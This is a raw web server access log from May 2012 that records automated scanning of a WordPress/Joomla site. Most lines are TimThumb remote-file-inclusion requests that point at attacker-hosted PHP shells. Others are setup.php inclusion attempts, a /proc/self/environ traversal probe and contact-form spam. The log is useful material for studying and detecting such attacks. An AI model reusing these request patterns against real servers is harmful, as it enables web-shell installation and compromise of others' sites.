216.70.71.78 - - [14/May/2012:08:06:21 +0200] "GET //wp-content/themes/Widescreen/tools/timthumb.php?src=http://blogger.com.tempoturismo.com.br/xx.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
70.32.83.233 - - [14/May/2012:08:06:30 +0200] "GET /wp-content/plugins/vslider/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
70.32.83.233 - - [14/May/2012:08:06:30 +0200] "GET /stats/wp-content/plugins/vslider/timthumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
70.32.83.233 - - [14/May/2012:08:06:31 +0200] "GET /stats/wp-content/plugins/vslider/timthumb.php?src=http://flickr.com.bpmohio.com/load.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
70.32.83.233 - - [14/May/2012:08:06:31 +0200] "GET /wp-content/plugins/vslider/timthumb.php?src=http://flickr.com.bpmohio.com/load.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:08:07:13 +0200] "GET /stats//wp-content/themes/Widescreen/tools/timthumb.php?src= HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:08:07:14 +0200] "GET /stats//wp-content/themes/Widescreen/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:08:07:14 +0200] "GET /stats//wp-content/themes/Widescreen/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:08:07:14 +0200] "GET //wp-content/themes/Widescreen/tools/timthumb.php?src= HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:08:07:14 +0200] "GET //wp-content/themes/Widescreen/tools/timthumb.php?src=http://blogger.com.pansoftds.com/sh.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
89.33.197.242 - - [14/May/2012:08:07:15 +0200] "GET //wp-content/themes/Widescreen/tools/timthumb.php?src=http://blogger.com.pansoftds.com/xx.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
78.137.37.171 - - [14/May/2012:08:08:26 +0200] "GET /logs/access_log HTTP/1.0" 200 1623617 "http://androidusplay.info/sitemap91.html" "Mozilla/4.7 (compatible; OffByOne; Windows 2000) Webster Pro V3.4"
78.137.37.171 - - [14/May/2012:08:08:27 +0200] "GET /logs/access_log HTTP/1.0" 200 1623819 "http://androidusplay.info/sitemap91.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)"
78.137.37.171 - - [14/May/2012:08:08:28 +0200] "GET /logs/access_log HTTP/1.0" 200 1624006 "http://androidusplay.info/sitemap91.html" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 3.1)"
78.137.37.171 - - [14/May/2012:08:08:28 +0200] "GET /logs/access_log HTTP/1.0" 200 1624190 "http://androidusplay.info/sitemap91.html" "Mozilla/0.91 Beta (Windows)"
78.137.37.171 - - [14/May/2012:08:08:29 +0200] "GET /logs/access_log HTTP/1.0" 200 1624354 "http://androidusplay.info/sitemap91.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)"
219.121.0.60 - - [14/May/2012:08:09:09 +0200] "POST /stats/log.keys.html/contact.php HTTP/1.1" 404 313 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
219.121.0.60 - - [14/May/2012:08:09:09 +0200] "POST /contact.php HTTP/1.1" 404 293 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
219.121.0.60 - - [14/May/2012:08:09:10 +0200] "POST /stats/contact.php HTTP/1.1" 404 299 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
219.121.0.60 - - [14/May/2012:08:09:10 +0200] "POST /stats/log.keys.html/contact.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (compatible;Baiduspider/2.0;+http://www.baidu.com/search/spider.html)"
219.121.0.60 - - [14/May/2012:08:09:10 +0200] "POST /contact.php HTTP/1.1" 404 293 "-" "Mozilla/5.0 (compatible;Baiduspider/2.0;+http://www.baidu.com/search/spider.html)"
219.121.0.60 - - [14/May/2012:08:09:11 +0200] "POST /stats/contact.php HTTP/1.1" 404 299 "-" "Mozilla/5.0 (compatible;Baiduspider/2.0;+http://www.baidu.com/search/spider.html)"
184.173.6.208 - - [14/May/2012:08:09:51 +0200] "GET /stats/log.keys.html//wp-content/themes/WPFanPro2.0/lib/scripts/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:08:09:52 +0200] "GET //wp-content/themes/WPFanPro2.0/lib/scripts/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:08:09:53 +0200] "GET /stats//wp-content/themes/WPFanPro2.0/lib/scripts/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 343 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:08:09:59 +0200] "GET /stats//wp-content/themes/WPFanPro2.0/lib/scripts/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 343 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:08:10:00 +0200] "GET //wp-content/themes/WPFanPro2.0/lib/scripts/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:08:10:07 +0200] "GET /stats/log.keys.html//wp-content/themes/WPFanPro2.0/lib/scripts/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 357 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:08:10:08 +0200] "GET //wp-content/themes/WPFanPro2.0/lib/scripts/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:08:10:09 +0200] "GET /stats//wp-content/themes/WPFanPro2.0/lib/scripts/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 343 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:08:10:12 +0200] "GET //wp-content/themes/WPFanPro2.0/lib/scripts/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:08:10:46 +0200] "GET /stats//wp-content/themes/WPFanPro2.0/lib/scripts/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 343 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:08:10:48 +0200] "GET //wp-content/themes/WPFanPro2.0/lib/scripts/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
91.121.89.20 - - [14/May/2012:08:10:56 +0200] "GET /stats/////?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6337669 "-" "libwww-perl/5.803"
91.121.89.20 - - [14/May/2012:08:11:00 +0200] "GET /////?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1058 "-" "libwww-perl/5.803"
184.173.6.208 - - [14/May/2012:08:11:10 +0200] "GET /stats//wp-content/themes/WPFanPro2.0/lib/scripts/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 343 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:08:11:11 +0200] "GET //wp-content/themes/WPFanPro2.0/lib/scripts/timthumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
95.132.213.162 - - [14/May/2012:08:12:59 +0200] "GET /logs/access_log HTTP/1.0" 200 1629482 "http://androidenplay.info/sitemap245.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.00"
95.132.213.162 - - [14/May/2012:08:13:03 +0200] "GET /logs/access_log HTTP/1.0" 200 1629686 "http://androidenplay.info/sitemap245.html" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]"
95.132.213.162 - - [14/May/2012:08:13:06 +0200] "GET /logs/access_log HTTP/1.0" 200 1629900 "http://androidenplay.info/sitemap245.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)"
95.132.213.162 - - [14/May/2012:08:13:18 +0200] "GET /logs/access_log HTTP/1.0" 200 1630098 "http://androidenplay.info/sitemap245.html" "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)"
95.132.213.162 - - [14/May/2012:08:13:22 +0200] "GET /logs/access_log HTTP/1.0" 200 1630302 "http://androidenplay.info/sitemap245.html" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)"
78.137.37.171 - - [14/May/2012:08:14:15 +0200] "GET /logs/access_log HTTP/1.0" 200 1630491 "http://androidusplay.info/sitemap98.html" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.00"
78.137.37.171 - - [14/May/2012:08:14:16 +0200] "GET /logs/access_log HTTP/1.0" 200 1630674 "http://androidusplay.info/sitemap98.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)"
78.137.37.171 - - [14/May/2012:08:14:16 +0200] "GET /logs/access_log HTTP/1.0" 200 1630875 "http://androidusplay.info/sitemap98.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; KTXN)"
78.137.37.171 - - [14/May/2012:08:14:17 +0200] "GET /logs/access_log HTTP/1.0" 200 1631068 "http://androidusplay.info/sitemap98.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; MRA 4.6 (build 01425); .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
78.137.37.171 - - [14/May/2012:08:14:17 +0200] "GET /logs/access_log HTTP/1.0" 200 1631338 "http://androidusplay.info/sitemap98.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)"
184.173.6.208 - - [14/May/2012:08:15:01 +0200] "GET /stats//wp-content/themes/myweblog/thumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
184.173.6.208 - - [14/May/2012:08:15:02 +0200] "GET //wp-content/themes/myweblog/thumb.php?src=http://blogger.com.kforkent.com/shell.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
202.150.216.211 - - [14/May/2012:08:15:07 +0200] "GET /stats//setup.php?dir=test?? HTTP/1.1" 404 298 "-" "Mozilla/5.0 (X11;U;Linux i686 (x86_64);en-US;rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
202.150.216.211 - - [14/May/2012:08:15:09 +0200] "GET /stats//setup.php?dir=http://novotempolivraria.com.br/loja/capek/idrfi.txt?? HTTP/1.1" 404 298 "-" "Mozilla/5.0 (X11;U;Linux i686 (x86_64);en-US;rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
202.150.216.211 - - [14/May/2012:08:15:09 +0200] "GET /stats//setup.php?dir=http://202.150.216.211/~admin/joomlatest/components/com_search/views/search/tmpl/fuckyou/daster.jpg?? HTTP/1.1" 404 298 "-" "Mozilla/5.0 (X11;U;Linux i686 (x86_64);en-US;rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
202.150.216.211 - - [14/May/2012:08:15:11 +0200] "GET /stats//setup.php?dir=http://202.150.216.211/~admin/joomlatest/components/com_search/views/search/tmpl/fuckyou/j2.jpg?? HTTP/1.1" 404 298 "-" "Mozilla/5.0 (X11;U;Linux i686 (x86_64);en-US;rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
202.150.216.211 - - [14/May/2012:08:15:12 +0200] "GET //setup.php?dir=test?? HTTP/1.1" 404 292 "-" "Mozilla/5.0 (X11;U;Linux i686 (x86_64);en-US;rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
202.150.216.211 - - [14/May/2012:08:15:14 +0200] "GET //setup.php?dir=http://novotempolivraria.com.br/loja/capek/idrfi.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0 (X11;U;Linux i686 (x86_64);en-US;rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
202.150.216.211 - - [14/May/2012:08:15:14 +0200] "GET //setup.php?dir=http://202.150.216.211/~admin/joomlatest/components/com_search/views/search/tmpl/fuckyou/daster.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0 (X11;U;Linux i686 (x86_64);en-US;rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
202.150.216.211 - - [14/May/2012:08:15:16 +0200] "GET //setup.php?dir=http://202.150.216.211/~admin/joomlatest/components/com_search/views/search/tmpl/fuckyou/j2.jpg?? HTTP/1.1" 404 292 "-" "Mozilla/5.0 (X11;U;Linux i686 (x86_64);en-US;rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6"
50.22.104.219 - - [14/May/2012:08:15:16 +0200] "GET /stats/log.keys.html HTTP/1.1" 200 20272 "http://www.grupposeit.it/stats/log.keys.html" "Opera/8.01 (Windows NT 5.1)"
91.149.157.176 - - [14/May/2012:08:15:27 +0200] "GET /stats//wp-content/themes/welcome_inn/thumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
91.149.157.176 - - [14/May/2012:08:15:29 +0200] "GET //wp-content/themes/welcome_inn/thumb.php?src=http%3A%2F%2Fflickr.com.bpmohio.com%2Fbad.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
199.59.58.152 - - [14/May/2012:08:16:49 +0200] "GET /stats///wp-content/themes/Avenue/timthumb.php?src=http://img.youtube.com.cr3ativiz.web.id/index.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
199.59.58.152 - - [14/May/2012:08:16:49 +0200] "GET ///wp-content/themes/Avenue/timthumb.php?src=http://img.youtube.com.cr3ativiz.web.id/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
199.59.58.152 - - [14/May/2012:08:17:12 +0200] "GET /stats///wp-content/themes/Avenue/timthumb.php?src=http://img.youtube.com.cr3ativiz.web.id/index.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
199.59.58.152 - - [14/May/2012:08:17:12 +0200] "GET ///wp-content/themes/Avenue/timthumb.php?src=http://img.youtube.com.cr3ativiz.web.id/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
199.59.58.152 - - [14/May/2012:08:17:27 +0200] "GET /stats/log.keys.html//wp-content/themes/welcome_inn/thumb.php?src=http://img.youtube.com.cr3ativiz.web.id/index.php HTTP/1.1" 404 342 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
199.59.58.152 - - [14/May/2012:08:17:27 +0200] "GET //wp-content/themes/welcome_inn/thumb.php?src=http://img.youtube.com.cr3ativiz.web.id/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
199.59.58.152 - - [14/May/2012:08:17:27 +0200] "GET /stats//wp-content/themes/welcome_inn/thumb.php?src=http://img.youtube.com.cr3ativiz.web.id/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
199.59.58.152 - - [14/May/2012:08:17:36 +0200] "GET /stats/log.keys.html//wp-content/themes/welcome_inn/thumb.php?src=http://img.youtube.com.cr3ativiz.web.id/index.php HTTP/1.1" 404 342 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
199.59.58.152 - - [14/May/2012:08:17:36 +0200] "GET //wp-content/themes/welcome_inn/thumb.php?src=http://img.youtube.com.cr3ativiz.web.id/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
199.59.58.152 - - [14/May/2012:08:17:36 +0200] "GET /stats//wp-content/themes/welcome_inn/thumb.php?src=http://img.youtube.com.cr3ativiz.web.id/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
219.121.0.60 - - [14/May/2012:08:17:48 +0200] "POST /stats/log.keys.html/contact.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (compatible;Baiduspider/2.0;+http://www.baidu.com/search/spider.html)"
219.121.0.60 - - [14/May/2012:08:17:48 +0200] "POST /contact.php HTTP/1.1" 404 293 "-" "Mozilla/5.0 (compatible;Baiduspider/2.0;+http://www.baidu.com/search/spider.html)"
219.121.0.60 - - [14/May/2012:08:17:49 +0200] "POST /stats/contact.php HTTP/1.1" 404 299 "-" "Mozilla/5.0 (compatible;Baiduspider/2.0;+http://www.baidu.com/search/spider.html)"
173.203.144.195 - - [14/May/2012:08:17:52 +0200] "GET /stats//wp-content/themes/welcome_inn/thumb.php?src=http://wordpress.com.junglerumblepartyvenue.co.za/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.203.144.195 - - [14/May/2012:08:17:52 +0200] "GET //wp-content/themes/welcome_inn/thumb.php?src=http://wordpress.com.junglerumblepartyvenue.co.za/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
199.59.58.152 - - [14/May/2012:08:17:55 +0200] "GET /stats///wp-content/themes/Avenue/timthumb.php?src=http://img.youtube.com.cr3ativiz.web.id/index.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
199.59.58.152 - - [14/May/2012:08:17:55 +0200] "GET ///wp-content/themes/Avenue/timthumb.php?src=http://img.youtube.com.cr3ativiz.web.id/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.203.144.195 - - [14/May/2012:08:17:56 +0200] "GET /stats//wp-content/themes/welcome_inn/thumb.php?src=http://wordpress.com.junglerumblepartyvenue.co.za/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.203.144.195 - - [14/May/2012:08:17:56 +0200] "GET //wp-content/themes/welcome_inn/thumb.php?src=http://wordpress.com.junglerumblepartyvenue.co.za/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
69.197.162.35 - - [14/May/2012:08:18:05 +0200] "GET //wp-content/plugins/igit-related-posts-with-thumb-images-after-posts/?src=http://wordpress.com.airatrip.com/temp/phantom.php HTTP/1.1" 404 351 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
199.59.58.152 - - [14/May/2012:08:18:11 +0200] "GET /stats//wp-content/themes/welcome_inn/thumb.php?src=http://img.youtube.com.cr3ativiz.web.id/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
199.59.58.152 - - [14/May/2012:08:18:11 +0200] "GET //wp-content/themes/welcome_inn/thumb.php?src=http://img.youtube.com.cr3ativiz.web.id/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
219.121.0.60 - - [14/May/2012:08:18:15 +0200] "POST /stats/log.keys.html/contact.php HTTP/1.1" 404 313 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
219.121.0.60 - - [14/May/2012:08:18:16 +0200] "POST /contact.php HTTP/1.1" 404 293 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
219.121.0.60 - - [14/May/2012:08:18:16 +0200] "POST /stats/contact.php HTTP/1.1" 404 299 "-" "Gigabot/3.0 (http://www.gigablast.com/spider.html)"
199.59.58.152 - - [14/May/2012:08:18:23 +0200] "GET /stats//wp-content/themes/welcome_inn/thumb.php?src=http://img.youtube.com.cr3ativiz.web.id/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
199.59.58.152 - - [14/May/2012:08:18:24 +0200] "GET //wp-content/themes/welcome_inn/thumb.php?src=http://img.youtube.com.cr3ativiz.web.id/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.203.144.195 - - [14/May/2012:08:18:25 +0200] "GET /stats/log.keys.html//wp-content/themes/welcome_inn/thumb.php?src=http://wordpress.com.junglerumblepartyvenue.co.za/index.php HTTP/1.1" 404 342 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.203.144.195 - - [14/May/2012:08:18:25 +0200] "GET //wp-content/themes/welcome_inn/thumb.php?src=http://wordpress.com.junglerumblepartyvenue.co.za/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
173.203.144.195 - - [14/May/2012:08:18:25 +0200] "GET /stats//wp-content/themes/welcome_inn/thumb.php?src=http://wordpress.com.junglerumblepartyvenue.co.za/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
199.59.58.152 - - [14/May/2012:08:18:31 +0200] "GET /stats/log.keys.html//wp-content/themes/welcome_inn/thumb.php?src=http://img.youtube.com.cr3ativiz.web.id/index.php HTTP/1.1" 404 342 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
199.59.58.152 - - [14/May/2012:08:18:31 +0200] "GET //wp-content/themes/welcome_inn/thumb.php?src=http://img.youtube.com.cr3ativiz.web.id/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
199.59.58.152 - - [14/May/2012:08:18:31 +0200] "GET /stats//wp-content/themes/welcome_inn/thumb.php?src=http://img.youtube.com.cr3ativiz.web.id/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
69.197.162.35 - - [14/May/2012:08:18:39 +0200] "GET /stats/log.keys.html//wp-content/plugins/igit-related-posts-with-thumb-images-after-posts/?src=http://wordpress.com.airatrip.com/temp/phantom.php HTTP/1.1" 404 371 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
199.59.58.152 - - [14/May/2012:08:18:39 +0200] "GET /stats/log.keys.html//wp-content/themes/welcome_inn/thumb.php?src=http://img.youtube.com.cr3ativiz.web.id/index.php HTTP/1.1" 404 342 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
199.59.58.152 - - [14/May/2012:08:18:39 +0200] "GET //wp-content/themes/welcome_inn/thumb.php?src=http://img.youtube.com.cr3ativiz.web.id/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
199.59.58.152 - - [14/May/2012:08:18:39 +0200] "GET /stats//wp-content/themes/welcome_inn/thumb.php?src=http://img.youtube.com.cr3ativiz.web.id/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
199.59.58.152 - - [14/May/2012:08:18:40 +0200] "GET /stats/log.keys.html//wp-content/themes/welcome_inn/thumb.php?src=http://img.youtube.com.cr3ativiz.web.id/index.php HTTP/1.1" 404 342 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
69.197.162.35 - - [14/May/2012:08:18:40 +0200] "GET //wp-content/plugins/igit-related-posts-with-thumb-images-after-posts/?src=http://wordpress.com.airatrip.com/temp/phantom.php HTTP/1.1" 404 351 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
199.59.58.152 - - [14/May/2012:08:18:40 +0200] "GET //wp-content/themes/welcome_inn/thumb.php?src=http://img.youtube.com.cr3ativiz.web.id/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
199.59.58.152 - - [14/May/2012:08:18:40 +0200] "GET /stats//wp-content/themes/welcome_inn/thumb.php?src=http://img.youtube.com.cr3ativiz.web.id/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
69.197.162.35 - - [14/May/2012:08:18:41 +0200] "GET /stats//wp-content/plugins/igit-related-posts-with-thumb-images-after-posts/?src=http://wordpress.com.airatrip.com/temp/phantom.php HTTP/1.1" 404 357 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
69.197.162.35 - - [14/May/2012:08:19:07 +0200] "GET /stats//wp-content/plugins/igit-related-posts-with-thumb-images-after-posts/?src=http://wordpress.com.airatrip.com/temp/phantom.php HTTP/1.1" 404 357 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
